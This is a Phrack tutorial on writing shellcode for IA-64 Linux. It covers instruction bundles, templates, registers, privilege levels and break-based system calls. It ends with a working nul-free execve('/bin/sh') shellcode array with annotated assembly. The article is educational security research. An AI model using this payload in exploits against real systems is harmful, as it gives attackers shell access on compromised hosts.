==Phrack Inc.==

 

Volume 0x0b, Issue 0x39, Phile #0x05 of 0x12

 

|=-------------------=[ WRITING SHELLCODE FOR IA-64 ]=-------------------=|

|=-----------=[ or: 'how to turn diamonds into jelly beans' ]------------=|

|=--------------------=[ papasutra of haquebright ]=---------------------=|

 

 

- Intro

- Big Picture

- Architecture

- EPIC

- Instructions

- Bundles

- Instruction Types and Templates

- Registers

- Register List

- Register Stack Engine

- Dependency Conflicts

- Alignment and Endianness

- Memory Protection

- Privilege Levels

- Coding

- GCC IA-64 Assembly Language

- Useful Instruction List

- Optimization

- Coding Aspects

- Example Code

- References

- Greetings

 

 

--> Intro

 

This paper outlines the techniques you need and the things I've

learned about writing shellcode for the IA-64. Although the IA-64 is

capable of executing IA-32 code, this is not topic of this paper.

Example code is for Linux, but most of this applies to all operating

systems that run on IA-64.

 

 

--> Big Picture

 

IA-64 is the successor to IA-32, formerly called the i386

architecture, which is implemented in all those PC chips like Pentium

and Athlon and so on.

It is developed by Intel and HP since 1994, and is available in the

Itanium chip. IA-64 will probably become the main architecture for the

Unix workstations of HP and SGI, and for Microsoft Windows. It is a 64

bit architecture, and is as such capable of doing 64 bit integer

arithmetic in hardware and addressing 2^64 bytes of memory. A very

interesting feature is the parallel execution of code, for which a

very special binary format is used.

So lets get a little more specific.

 

 

--> EPIC

 

On conventional architectures, parallel code execution is made

possible by the chip itself. The instructions read are analyzed,

reordered and grouped by the hardware at runtime, and therefore only

very conservative assumptions can be made.

EPIC stands for 'explicit parallel instruction computing'. It works by

grouping the code into independent parts at compile time, that is, the

assembly code must already contain the dependency information.

 

 

--> Instructions

 

The instruction size is fixed at 41 bits. Each instruction is made up

of five fields:

 

+-----------+-----------+-----------+-----------+-----------+

| opcode | operand 1 | operand 2 | operand 3 | predicate |

+-----------+-----------+-----------+-----------+-----------+

| 40 to 27 | 26 to 20 | 19 to 13 | 12 to 6 | 5 to 0 |

+-----------+-----------+-----------+-----------+-----------+

 

The large opcode space of 14 bits is used for specializing

operations. For example, there are different branch instructions for

branches that are taken often and ones taken seldomly. This extra

information is then used in the branch prediction unit.

 

There are three operand fields usable for immediate values or register

numbers. Some instructions combine all three operand fields to a

single 21 bit immediate value field. It is also possible to append a

complete 41 bit instruction slot to another one to form a 64 bit

immediate value field.

 

The last field references a so called predicate register by a 6 bit

number. Precicate registers each contain a single bit to represent the

boolean values 'true' and 'false'. If the value is 'false' at

execution time, the instruction is discarded just before it takes

effect. Note that some instructions cannot be predicated.

 

If a certain operation does not need a certain field in the scheme

above, it is set to zero by the assembler. I tried to fill in other

values, and it still worked. But this may not be the case for every

instruction and every implementation of the IA-64 architecture. So be

careful about this...

Also note that there are some shortcut instructions such as mov, which

for real is just an add operation with register 0 (constant 0) as the

other argument.

 

 

--> Bundles

 

In the compiled code, instructions are grouped together to 'bundles'

of three. Included in every bundle is a five bit template field that

specifies which hardware units are needed for the execution.

So what it boils down to is a bundle length of 128 bits. Nice, eh?

 

+-----------+----------+---------+----------+

| instr 1 | instr 2 | instr 3 | template |

|-----------+----------+---------+----------|

| 127 to 87 | 86 to 46 | 45 to 5 | 4 to 0 |

+-----------+----------+---------+----------+

 

Templates are used to dispatch the instructions to the different

hardware units. This is quite straightforward, the dispatcher just has

to switch over the template bits.

 

Templates can also encode a so-called 'stop' after instruction slots.

Stops are used to break parallel instruction execution, and you will

need them to solve Data Flow Dependencies (see below). You can put a

stop after every complete bundle, but if you need to save space, it is

often better to stop after an instruction in the middle of a bundle.

This does not work for every template, so you need to check the

template table below for this.

 

The independent code regions between stops are called instruction

groups. Making use of the parallel semantics they carry, the Itanium

for example is capable of executing up to two bundles at once, if

there are enough execution units for the set of instructions specified

in the templates. In the next implementations the numbers will be

higher for sure.

 

 

--> Instruction Types and Templates

 

There are different instruction types, grouped by the hardware unit

they need. Only certain combinations are allowed in a single bundle.

Instruction types are A (ALU Integer), I (Non-ALU Integer), M

(Memory), F (Floating Point), B (Branch) and L+X (Extended). The X

slots may also contain break.i and nop.i for compatibility reasons.

 

In the following template list, '|' is a stop:

 

00 M I I

01 M I I|

02 M I|I <- in-bundle stop

03 M I|I| <- in-bundle stop

04 M L X

05 M L X|

06 reserved

07 reserved

08 M M I

09 M M I|

0a M|M I <- in-bundle stop

0b M|M I| <- in-bundle stop

0c M F I

0d M F I|

0e M M F

0f M M F|

10 M I B

11 M I B|

12 M B B

13 M B B|

14 reserved

15 reserved

16 B B B

17 B B B|

18 M M B

19 M M B|

1a reserved

1b reserved

1c M F B

1d M F B|

1e reserved

1f reserved

 

 

--> Registers

 

This is not a comprehensive list, check [1] if you need one.

 

IA-64 specifies 128 general (integer) registers (r0..r127). There are

128 floating point registers, too (f0..f127).

 

Predicate Registers (p0..p63) are used for optimizing runtime

decisions. For example, 'if' results can be handled without branches

by setting a predicate register to the result of the 'if', and using

that predicate for the conditional code. As outlined above, predicate

registers are referenced by a field in every instruction. If no

register is specified, p0 is filled in by the assembler. p0 is always

'true'.

 

Branch Registers (b0..b7) are used for indirect branches and

calling. Branch instructions can only handle branch registers. When

calling a function, the return address is stored in b0 by

convention. It is saved to local registers by the called function if

it needs to call other functions itself.

 

There are the special registers Loop Count (LC) and Epilogue Count

(EC). Their use is explained in the optimization chapter.

 

The Current Frame Marker (CFM) holds the state of the register

rotation. It is not accessible directly. The Instruction Pointer (IP)

contains the address of the bundle that is currently executed.

 

The User Mask (UM):

+-------+-------------------------------------------------------------+

| flag | purpose |

+-------+-------------------------------------------------------------+

| UM.be | set this to 1 for big endian data access |

| UM.ac | if this is 0, Unaligned Memory Faults are raised only if |

| | the situation cannot be handled by the processor at all |

+-------+-------------------------------------------------------------+

The User Mask can be modified from any privilege level (see below).

 

Some interesting Processor Status Register (PSM) fields:

+---------+-----------------------------------------------------------+

| flag | purpose |

+---------+-----------------------------------------------------------+

| PSR.pk | if this is 0, protection key checks are disabled |

| PSR.dt | if this is 0, physical addressing is used for data |

| | access; access rights are not checked. |

| PSR.it | if this is 0, physical addressing is used for instruction |

| | access; access rights are not checked. |

| PSR.rt | if this is 0, the register stack translation is disabled |

| PSR.cpl | this is the current privilege level. See its chapter for |

| | details. |

+---------+-----------------------------------------------------------+

All but the last of these fields can only be modifiled from privilege

level 0 (see below).

 

 

--> Register List

 

+---------+------------------------------+

| symbol | Usage Convention |

+---------+------------------------------+

| b0 | Call Register |

| b1-b5 | Must be preserved |

| b6-b7 | Scratch |

| r0 | Constant Zero |

| r1 | Global Data Pointer |

| r2-r3 | Scratch |

| r4-r5 | Must be preserved |

| r8-r11 | Procedure Return Values |

| r12 | Stack Pointer |

| r13 | (Reserved as) Thread Pointer |

| r14-r31 | Scratch |

| r32-rxx | Argument Registers |

| f2-f5 | Preserved |

| f6-f7 | Scratch |

| f8-f15 | Argument/Return Registers |

| f16-f31 | Must be preserved |

+---------+------------------------------+

Additionaly, LC must be preserved.

 

 

--> Register Stack Engine

 

IA-64 provides you with a register stack. There is a register frame,

consisting of input (in), local (loc), and output (out) registers. To

allocate a stack frame, use the 'alloc' instruction (see [1]). When a

function is called, the stack frame is shifted, so that the former

output registers become the new input registers. Note that you need to

allocate a stack frame even if you only want to access the input

registers.

 

Unlike on SPARC, there are no 'save' and 'restore' instructions needed

in this scheme. Also, the (memory) stack is not used to pass arguments

to functions.

 

The Register Stack Engine also provides you with register

rotation. This makes modulo-scheduling possible, see the optimization

chapter for this. The 'alloc' described above specifies how many

general registers rotate, the rotating region always begins at r32,

and overlaps the local and output registers. Also, the predicate

registers p16 to p63 and the floating point register f32 to f127

rotate.

 

 

--> Dependency Conflicts

 

Dependency conflicts are formally classified into three categories:

 

- Control Flow Conflicts

 

These occur when assumptions are made if a branch is taken or not.

For example, the code following a branch instruction must be discarded

when it is taken. On IA-64, this happens automatically. But if the

code is optimized using control speculation (see [1]), control flow

conflicts must be resolved manually. Hardware support is provided.

 

- Memory Conflicts

 

The reason for memory conflicts is the higher latency of memory

accesses compared to register accesses. Memory access is therefore

causing the execution to stall. IA-64 introduces data speculation (see

[1]) to be able to move loads to be executed as early as possible in

the code.

 

- Data Flow Conflicts

These occur when there are instructions that share registers or memory

fields in a block marked for parallel execution. This leads to

undefined behavior and must be prevented by the coder. This is the

type of conflict that will bother you the most, especially when trying

to write compact code!

 

 

--> Alignment and Endianess

 

As on many other architectures, you have to align your data and

code. On IA-64, code must be aligned on 16 byte boundaries, and is

stored in little endian byte order. Data fields should be aligned

according to their size, so an 8 bit char should be aligned on 1 byte

boundaries. There is a special rule for 10 byte floating point numbers

(should you ever need them), that is you have to align it on 16 byte

boundaries. Data endianess is controlled by the UM.be bit in the user

mask ('be' means big endian enable). On IA-64 Linux, little endian is

default.

 

 

--> Memory Protection

 

Memory is divided into several virtual pages. There is a set of

Protection Key Registers (PKR) that contain all keys required for a

process. The Operating System manages the PKR. Before memory access is

permitted, the key of the respective memory field (which is stored in

the Translation Lookaside Buffer) is compared to all the PKR keys. If

none matches, a Key Miss fault is raised. If there is a matching key,

it is checked for read, write and execution rights. Access

capabilities are calculated from the key's access rights field, the

privilege level of the memory page and the current privilege level

of the executing code (see [1] for details). If an operation is to be

performed which is not covered by the calculated capabilities, a Key

Permission Fault is generated.

 

 

--> Privilege Levels

 

There are four privilege levels numbered from 0..3, with 0 being the

most privileged one. System instructions and registers can only be

called from level 0. The current privilege level (CPL) is stored in

PSR.cpl. The following instructions change the CPL:

 

- enter privileged code (epc)

The epc instruction sets the CPL to the privilege level of the page

containing the epc instruction, if it is numerically higher than the

CPL. The page must be execute only, and the CPL must not be

numerically lower than the previous privilege level.

 

- break

'break' issues a Break Instruction Fault. As every instruction fault

on IA-64, this sets the CPL to 0. The immediate value stored in the

break encoding is the address of the handler.

 

- branch return

This resets the CPL to previous value.

 

 

--> GCC IA-64 Assembly Language

 

As you should have figured out by now, assembly language is normally

not used to program a chip like this. The optimization techniques are

very difficult for a programmer to exploit by hand (although possible

of course). Assembly will always be used to call some processor ops

that programming languanges do not support directly, for algoritm

coding, and for shellcode of course.

 

The syntax basically works like this:

(predicate_num) opcode_name operand_1 = operand_2, operand_3

Example:

(p1) fmul f1 = f2, f3

 

As mentioned in the instruction format chapter, sometimes not all

operand fields are used, or operand fields are combined.

Additionally, there are some instructions which cannot be predicated.

 

Stops are encoded by appending ';;' to the last instruction of an

instruction group. Symbolic names are used to reference procedures, as

always.

 

 

--> Useful Instruction List

 

Although you will have to check [3] in any case, here are a very few

instructions you may want to check first:

+--------+------------------------------------------------------------+

| name | description |

+--------+------------------------------------------------------------+

| dep | deposit an 8 bit immediate value at an arbitrary position |

| | in a register |

| dep | deposit a portion of one reg into another |

| mov | branch register to general register |

| mov | max 22 bit immediate value to general register |

| movl | max 64 bit immediate value to general register |

| adds | add short |

| branch | indirect form, non-call |

+--------+------------------------------------------------------------+

 

 

--> Optimizations

 

There are some optimization techniques that become possible on

IA-64. However because the topic of this paper is not how to write

fast code, they are not explained here. Check [5] for more information

about this, especially look into Modulo Scheduling. It allows you to

overlap multiple iterations of a loop, which leads to very compact

code.

 

 

--> Coding Aspects

 

Stack: As on IA-32, the stack grows to the lower memory

addresses. Only local variables are stored on the stack.

 

System calls: Although the epc instruction is meant to be used

instead, Linux on IA-64 uses Break Instruction Faults to do a system

call. According to [6], Linux will switch to epc some day, but this

has not yet happened. The handler address used for issuing a system

call is 0x100000. As stated above, break can only use immediate values

as handler addresses. This introduces the need to construct the break

instruction in the shellcode. This is done in the example code below.

 

Setting predicates: Do that by using the compare (cmp)

instructions. Predicates might also come handy if you need to fill

some space with instructions, and want to cancel them out to form

NOPs.

 

Getting the hardware: Check [2] or [7] for experimenting with IA-64,

if you do not have one yourself.

 

 

--> Example Code

 

<++> ia64-linux-execve.c !f4ed8837

/*

* ia64-linux-execve.c

* 128 bytes.

*

*

* NOTES:

*

* the execve system call needs:

* - command string addr in r35

* - args addr in r36

* - env addr in r37

*

* as ia64 has fixed-length instructions (41 bits), there are a few

* instructions that have unused bits in their encoding.

* i used that at two points where i did not find nul-free equivalents.

* these are marked '+0x01', see below.

*

* it is possible to save at least one instruction by loading bundle[1]

* as a number (like bundle[0]), but that would be a less interesting

* solution.

*

*/

 

unsigned long shellcode[] = {

 

/* MLX

* alloc r34 = ar.pfs, 0, 3, 3, 0 // allocate vars for syscall

* movl r14 = 0x0168732f6e69622f // aka "/bin/sh",0x01

* ;; */

0x2f6e458006191005,

0x631132f1c0016873,

 

/* MLX

* xor r37 = r37, r37 // NULL

* movl r17 = 0x48f017994897c001 // bundle[0]

* ;; */

0x9948a00f4a952805,

0x6602e0122048f017,

 

/* MII

* adds r15 = 0x1094, r37 // unfinished bundle[1]

* or r22 = 0x08, r37 // part 1 of bundle[1]

* dep r12 = r37, r12, 0, 8 // align stack ptr

* ;; */

0x416021214a507801,

0x4fdc625180405c94,

 

/* MII

* adds r35 = -40, r12 // circling mem addr 1, shellstr addr

* adds r36 = -32, r12 // circling mem addr 2, args[0] addr

* dep r15 = r22, r15, 56, 8 // patch bundle[1] (part 1)

* ;; */

0x0240233f19611801,

0x41dc7961e0467e33,

 

/* MII

* st8 [r36] = r35, 16 // args[0] = shellstring addr

* adds r19 = -16, r12 // prepare branch addr: bundle[0] addr

* or r23 = 0x42, r37 // part 2 of bundle[1]

* ;; */

0x81301598488c8001,

0x80b92c22e0467e33,

 

/* MII

* st8 [r36] = r17, 8 // store bundle[0]

* dep r14 = r37, r14, 56, 8 // fix shellstring

* dep r15 = r23, r15, 16, 8 // patch bundle[1] (part 2)

* ;; */

0x28e0159848444001,

0x4bdc7971e020ee39,

 

/* MMI

* st8 [r35] = r14, 25 // store shellstring

* cmp.eq p2, p8 = r37, r37 // prepare predicate for final branch.

* mov b6 = r19 // (+0x01) setup branch reg

* ;; */

0x282015984638c801,

0x07010930c0701095,

 

/* MIB

* st8 [r36] = r15, -16 // store bundle[1]

* adds r35 = -25, r35 // correct string addr

* (p2) br.cond.spnt.few b6 // (+0x01) branch to constr. bundle

* ;; */

0x3a301799483f8011,

0x0180016001467e8f,

};

 

/*

* the constructed bundle

*

* MII

* st8 [r36] = r37, -8 // args[1] = NULL

* adds r15 = 1033, r37 // syscall number

* break.i 0x100000

* ;;

*

* encoding is:

* bundle[0] = 0x48f017994897c001

* bundle[1] = 0x0800000000421094

*/

<-->

 

--> References

 

[1] HP IA-64 instruction set architecture guide

http://devresource.hp.com/devresource/Docs/Refs/IA64ISA/

[2] HP IA-64 Linux Simulator and Native User Environment

http://www.software.hp.com/products/LIA64/

[3] Intel IA-64 Manuals

http://developer.intel.com/design/ia-64/manuals/

[4] Sverre Jarp: IA-64 tutorial

http://cern.ch/sverre/IA64_1.pdf

[5] Sverre Jarp: IA-64 performance-oriented programming

http://sverre.home.cern.ch/sverre/IA-64_Programming.html

[6] A presentation about the Linux port to IA-64

http://linuxia64.org/logos/IA64linuxkernel.PDF

[7] Compaq Testdrive Program

http://www.testdrive.compaq.com

 

The register list is mostly copied from [4]

 

 

--> Greetings

 

palmers, skyper and scut of team teso

honx and homek of dudelab

 

|=[ EOF ]=---------------------------------------------------------------=|